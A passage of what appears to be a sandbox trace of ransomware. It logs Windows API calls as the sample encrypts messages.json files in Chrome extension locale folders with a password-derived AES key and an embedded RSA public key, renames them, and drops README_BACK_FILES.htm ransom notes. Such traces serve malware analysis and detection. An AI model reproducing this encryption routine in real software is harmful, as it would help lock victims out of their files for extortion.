lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.581] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.581] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.581] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.581] GetLastError () returned 0x0 [0253.581] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json")) returned 0x20 [0253.581] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0253.582] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.582] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.583] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.584] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.586] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.586] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.586] CryptHashData (hHash=0x29846a0, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.586] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.586] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.586] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.586] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987fd8) returned 1 [0253.587] CryptImportPublicKeyInfo (in: hCryptProv=0x2987fd8, dwCertEncodingType=0x1, pInfo=0x2995900*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995930*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995938*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29857a0) returned 1 [0253.587] CryptEncrypt (in: hKey=0x29857a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.587] CryptEncrypt (in: hKey=0x29857a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987b10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987b10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.587] WriteFile (in: hFile=0x5d60, lpBuffer=0x2987b10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987b10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.589] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0253.591] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.591] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.591] CloseHandle (hObject=0x5d5c) returned 1 [0253.591] CloseHandle (hObject=0x5d60) returned 1 [0253.591] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0253.595] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0253.595] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0253.596] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0253.598] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.598] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.598] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.598] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.598] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.598] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0253.598] AreFileApisANSI () returned 1 [0253.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.598] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.599] GetFileType (hFile=0x5d50) returned 0x1 [0253.599] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.600] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.600] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.601] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.601] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.601] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.601] GetLastError () returned 0x0 [0253.601] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json")) returned 0x20 [0253.602] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0253.603] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.603] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.605] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.606] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.608] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.608] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.608] CryptHashData (hHash=0x29846a0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.608] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.608] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.608] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.608] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988060) returned 1 [0253.609] CryptImportPublicKeyInfo (in: hCryptProv=0x2988060, dwCertEncodingType=0x1, pInfo=0x298e330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e368*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985360) returned 1 [0253.609] CryptEncrypt (in: hKey=0x2985360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.609] CryptEncrypt (in: hKey=0x2985360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987208*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987208*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.609] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987208*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987208*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.611] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xec, lpOverlapped=0x0) returned 1 [0253.612] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xec, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.612] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.612] CloseHandle (hObject=0x5d60) returned 1 [0253.612] CloseHandle (hObject=0x5d5c) returned 1 [0253.612] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0253.616] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0253.617] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0253.618] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0253.620] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.620] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.620] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.620] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.620] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.620] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0253.621] AreFileApisANSI () returned 1 [0253.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.621] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.621] GetFileType (hFile=0x5d50) returned 0x1 [0253.622] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.623] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.623] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.623] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.623] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.623] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.623] GetLastError () returned 0x0 [0253.623] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json")) returned 0x20 [0253.623] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0253.624] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.624] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.625] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.626] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.628] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.628] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.628] CryptHashData (hHash=0x29846a0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.628] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.628] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.628] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | 